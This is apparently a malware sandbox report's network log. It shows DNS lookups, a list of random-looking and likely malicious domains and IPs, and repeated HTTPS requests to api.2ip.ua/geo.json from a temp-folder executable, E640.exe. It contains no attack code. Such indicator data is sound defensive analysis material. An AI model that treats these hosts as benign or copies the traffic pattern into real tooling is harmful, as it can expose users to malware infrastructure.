Jul 27, 2023 20:20:22.714488029 CEST	8.8.8.8	192.168.2.4	0xc134	No error (0)	www.transsib.com	www.studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.714488029 CEST	8.8.8.8	192.168.2.4	0xc134	No error (0)	www.studyrussian.com	studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.714488029 CEST	8.8.8.8	192.168.2.4	0xc134	No error (0)	studyrussian.com		80.74.154.6	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.793642998 CEST	8.8.8.8	192.168.2.4	0x8bc2	No error (0)	www.abart.pl	abart.pl		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.793642998 CEST	8.8.8.8	192.168.2.4	0x8bc2	No error (0)	abart.pl		89.161.163.246	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.957559109 CEST	8.8.8.8	192.168.2.4	0xb68	No error (0)	www.abdg.com		192.252.154.18	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.270032883 CEST	8.8.8.8	192.168.2.4	0x4340	No error (0)	www.xaicom.es	xaicom.es		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:23.270032883 CEST	8.8.8.8	192.168.2.4	0x4340	No error (0)	xaicom.es		188.165.133.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.400243998 CEST	8.8.8.8	192.168.2.4	0xbc46	No error (0)	www.ora.ecnet.jp	ora.ecnet.jp		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:23.400243998 CEST	8.8.8.8	192.168.2.4	0xbc46	No error (0)	ora.ecnet.jp		60.43.154.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:23.933275938 CEST	8.8.8.8	192.168.2.4	0xfe78	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:23.933275938 CEST	8.8.8.8	192.168.2.4	0xfe78	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.064557076 CEST	8.8.8.8	192.168.2.4	0x5fd	No error (0)	www.naoi-a.com		202.254.236.40	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.293924093 CEST	8.8.8.8	192.168.2.4	0x2568	No error (0)	www.hummer.hu	hummer.hu		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:24.293924093 CEST	8.8.8.8	192.168.2.4	0x2568	No error (0)	hummer.hu		185.80.51.179	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.297290087 CEST	8.8.8.8	192.168.2.4	0x1855	No error (0)	www.iamdirt.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:24.297290087 CEST	8.8.8.8	192.168.2.4	0x1855	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:24.297290087 CEST	8.8.8.8	192.168.2.4	0x1855	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.552356958 CEST	8.8.8.8	192.168.2.4	0x1baf	No error (0)	www.yocinc.org		66.94.119.160	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.820796013 CEST	8.8.8.8	192.168.2.4	0xa393	No error (0)	www.aevga.com	aevga.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:24.820796013 CEST	8.8.8.8	192.168.2.4	0xa393	No error (0)	aevga.com		108.167.164.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.891391039 CEST	8.8.8.8	192.168.2.4	0x7d40	No error (0)	www.wifi4all.nl		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:24.891391039 CEST	8.8.8.8	192.168.2.4	0x7d40	No error (0)	www.wifi4all.nl		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.013736010 CEST	8.8.8.8	192.168.2.4	0xdfa7	No error (0)	www.gpthink.com		39.99.233.155	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.334614038 CEST	8.8.8.8	192.168.2.4	0x1a06	No error (0)	www.waldi.pl	waldi.pl		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:25.334614038 CEST	8.8.8.8	192.168.2.4	0x1a06	No error (0)	waldi.pl		46.242.238.60	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.837872028 CEST	8.8.8.8	192.168.2.4	0x91d4	No error (0)	www.mqs.com.br	www.mqs.com.br.cdn.gocache.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:25.837872028 CEST	8.8.8.8	192.168.2.4	0x91d4	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.174.30	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:25.837872028 CEST	8.8.8.8	192.168.2.4	0x91d4	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.173.30	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:28.811732054 CEST	8.8.8.8	192.168.2.4	0xc139	No error (0)	www.fcwcvt.org		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:28.811732054 CEST	8.8.8.8	192.168.2.4	0xc139	No error (0)	www.fcwcvt.org		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.176908970 CEST	8.8.8.8	192.168.2.4	0x11de	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.276669025 CEST	8.8.8.8	192.168.2.4	0x56a3	No error (0)	www.t-tre.com		135.181.73.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.456357002 CEST	8.8.8.8	192.168.2.4	0xc794	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.588254929 CEST	8.8.8.8	192.168.2.4	0xce2b	No error (0)	www.stnic.co.uk		77.68.50.105	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.654789925 CEST	8.8.8.8	192.168.2.4	0xdfb4	No error (0)	www.holleman.us		51.79.51.72	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.784606934 CEST	8.8.8.8	192.168.2.4	0xe677	No error (0)	www.jacomfg.com		96.127.180.42	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:29.984975100 CEST	8.8.8.8	192.168.2.4	0xf0c	No error (0)	www.valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:30.122201920 CEST	8.8.8.8	192.168.2.4	0x8667	No error (0)	www.snugpak.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:30.122201920 CEST	8.8.8.8	192.168.2.4	0x8667	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.308595896 CEST	8.8.8.8	192.168.2.4	0x2d05	No error (0)	www.cokocoko.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.308595896 CEST	8.8.8.8	192.168.2.4	0x2d05	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.308595896 CEST	8.8.8.8	192.168.2.4	0x2d05	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.308595896 CEST	8.8.8.8	192.168.2.4	0x2d05	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.484734058 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	www.netcr.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.484734058 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.484734058 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.484734058 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.620964050 CEST	8.8.8.8	192.168.2.4	0xd36b	No error (0)	www.photo4b.com		195.78.66.50	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.786708117 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	www.netcr.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.786708117 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.786708117 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.786708117 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:31.802109003 CEST	8.8.8.8	192.168.2.4	0x3163	No error (0)	www.2print.com	2print.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:31.802109003 CEST	8.8.8.8	192.168.2.4	0x3163	No error (0)	2print.com		107.180.98.101	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.184546947 CEST	8.8.8.8	192.168.2.4	0x78f3	No error (0)	www.nelipak.nl		82.201.61.230	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.827459097 CEST	8.8.8.8	192.168.2.4	0x24bd	No error (0)	www.x0c.com		104.143.9.110	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.827459097 CEST	8.8.8.8	192.168.2.4	0x24bd	No error (0)	www.x0c.com		104.143.9.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:32.900113106 CEST	8.8.8.8	192.168.2.4	0xdb99	No error (0)	www.mobilnic.net		154.203.14.100	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.036834002 CEST	8.8.8.8	192.168.2.4	0x20c5	No error (0)	www.speelhal.net		217.19.237.54	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.506023884 CEST	8.8.8.8	192.168.2.4	0xca98	No error (0)	www.edimart.hu		81.2.194.241	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	www.lrsuk.com	language-recruitment.eu-2.volcanic.cloud		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	language-recruitment.eu-2.volcanic.cloud	d2kt7vovxa5e81.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.224.103.24	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.224.103.91	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.224.103.118	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.664650917 CEST	8.8.8.8	192.168.2.4	0x8f26	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.224.103.99	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.977298975 CEST	8.8.8.8	192.168.2.4	0xbfb	No error (0)	www.findbc.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:33.977298975 CEST	8.8.8.8	192.168.2.4	0xbfb	No error (0)	www.findbc.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:34.171571970 CEST	8.8.8.8	192.168.2.4	0x99e6	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.056179047 CEST	8.8.8.8	192.168.2.4	0xd640	No error (0)	www.pupi.cz		103.224.182.241	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.134124041 CEST	8.8.8.8	192.168.2.4	0x7cae	No error (0)	www.c9dd.com		188.166.152.188	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.714819908 CEST	8.8.8.8	192.168.2.4	0xb9b0	No error (0)	www.pcgrate.com		172.67.201.26	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.714819908 CEST	8.8.8.8	192.168.2.4	0xb9b0	No error (0)	www.pcgrate.com		104.21.66.46	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:35.832137108 CEST	8.8.8.8	192.168.2.4	0xce5a	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:36.387052059 CEST	8.8.8.8	192.168.2.4	0x4886	No error (0)	www.domon.com	meubles-domon.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:36.387052059 CEST	8.8.8.8	192.168.2.4	0x4886	No error (0)	meubles-domon.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:36.387052059 CEST	8.8.8.8	192.168.2.4	0x4886	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:37.412255049 CEST	8.8.8.8	192.168.2.4	0x1dc9	No error (0)	www.fink.com		69.163.218.51	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:37.559292078 CEST	8.8.8.8	192.168.2.4	0xa389	No error (0)	www.pwd.org	pwd.org		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:37.559292078 CEST	8.8.8.8	192.168.2.4	0xa389	No error (0)	pwd.org		208.109.214.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:39.431380033 CEST	8.8.8.8	192.168.2.4	0x693b	No error (0)	www.nqks.com	live.websites.hibu.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:39.431380033 CEST	8.8.8.8	192.168.2.4	0x693b	No error (0)	live.websites.hibu.com	hibu-4.zenedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:39.431380033 CEST	8.8.8.8	192.168.2.4	0x693b	No error (0)	hibu-4.zenedge.net	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:39.431380033 CEST	8.8.8.8	192.168.2.4	0x693b	No error (0)	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net	hibu34.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:39.431380033 CEST	8.8.8.8	192.168.2.4	0x693b	No error (0)	hibu34.inregion.waas.oci.oraclecloud.net		147.154.0.23	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:40.267713070 CEST	8.8.8.8	192.168.2.4	0x318a	No error (0)	www.myropcb.com		74.208.236.101	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.005826950 CEST	8.8.8.8	192.168.2.4	0x26a2	No error (0)	www.medius.si	d2r2uj0bnofxxz.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:42.005826950 CEST	8.8.8.8	192.168.2.4	0x26a2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		18.165.183.21	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.005826950 CEST	8.8.8.8	192.168.2.4	0x26a2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		18.165.183.99	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.005826950 CEST	8.8.8.8	192.168.2.4	0x26a2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		18.165.183.69	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.005826950 CEST	8.8.8.8	192.168.2.4	0x26a2	No error (0)	d2r2uj0bnofxxz.cloudfront.net		18.165.183.19	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.364094973 CEST	8.8.8.8	192.168.2.4	0xa6a1	No error (0)	www.ka-mo-me.com		211.1.226.67	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.707542896 CEST	8.8.8.8	192.168.2.4	0x1e07	No error (0)	www.nunomira.com	nunomira.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:42.707542896 CEST	8.8.8.8	192.168.2.4	0x1e07	No error (0)	nunomira.com		192.241.158.94	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:42.784396887 CEST	8.8.8.8	192.168.2.4	0xa926	No error (0)	www.yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.124336958 CEST	8.8.8.8	192.168.2.4	0xf17e	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.250454903 CEST	8.8.8.8	192.168.2.4	0xe89b	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.269210100 CEST	8.8.8.8	192.168.2.4	0xd3b7	No error (0)	www.com-sit.com		104.26.11.81	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.269210100 CEST	8.8.8.8	192.168.2.4	0xd3b7	No error (0)	www.com-sit.com		172.67.70.223	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.269210100 CEST	8.8.8.8	192.168.2.4	0xd3b7	No error (0)	www.com-sit.com		104.26.10.81	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.305392981 CEST	8.8.8.8	192.168.2.4	0x89ce	No error (0)	www.vexcom.com		104.21.55.224	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.305392981 CEST	8.8.8.8	192.168.2.4	0x89ce	No error (0)	www.vexcom.com		172.67.173.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:43.413691044 CEST	8.8.8.8	192.168.2.4	0x1f4c	No error (0)	www.sjbs.org	sjbs.org		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:43.413691044 CEST	8.8.8.8	192.168.2.4	0x1f4c	No error (0)	sjbs.org		69.163.239.62	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

nordskills.eu

shsplatform.co.uk

tivdql.com

potunulit.org

wnkect.com

colisumy.com

kyhefmpme.com

gxdkspne.org

jwgfkd.net

eppisrek.com

syoqjwtsy.com

utxddejra.com

clokc.net

semkty.net

95.214.25.207:3003

njbbvk.com

cntkwnpff.com

oigrtqrm.net

pamwou.net

45.9.74.80

ghsoiykp.com

mwhjnvruw.net

us.imgjeoigaa.com

5.42.65.80

aa.imgjeoogbb.com

ocdxwp.org

tyeehjyvqc.com

vuanqjlhqr.com

uvjfufoseg.net

greenbi.net

fellue.org

yrkcfyl.com

akqhbo.net

wedcu.net

qbdid.com

rwjvbnqap.net

bncsi.net

bwpkumaily.com

eoicmrqvhn.org

gdkus.org

sdpvg.com

qhixmkmx.com

gtokjwlubk.com

qihivxcs.org

aijct.net

buvrvkb.org

egcrsohl.com

ndaad.net

ebiwihql.com

ryhfhsr.org

xbajvknjfp.net

reinroot.top

bvwvnnb.org

xuyeaqhnxe.org

aeakmhmnjt.com

sexptmpsjy.net

iijfduon.net

xsetby.net

adriaenclaeys.top

pswpbjp.com

h170013.srv22.test-hf.su

fyujhvam.org

kucjewn.net

wchfiovwhj.com

gstatic-node.io

www.ftchat.com

www.rs-ag.com

www.wifi4all.nl

www.fcwcvt.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49684	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	Direction	Data
2023-07-27 18:18:47 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:18:47 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:18:47 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:18:47 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49685	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:18:48 UTC	1	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:18:48 UTC	1	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:18:48 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:18:48 UTC	1	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49823	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:35 UTC	950	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:35 UTC	950	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:35 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-07-27 18:19:35 UTC	951	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49830	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\E640.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-27 18:19:36 UTC	951	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-07-27 18:19:36 UTC	951	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 27 Jul 2023 18:19:36 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
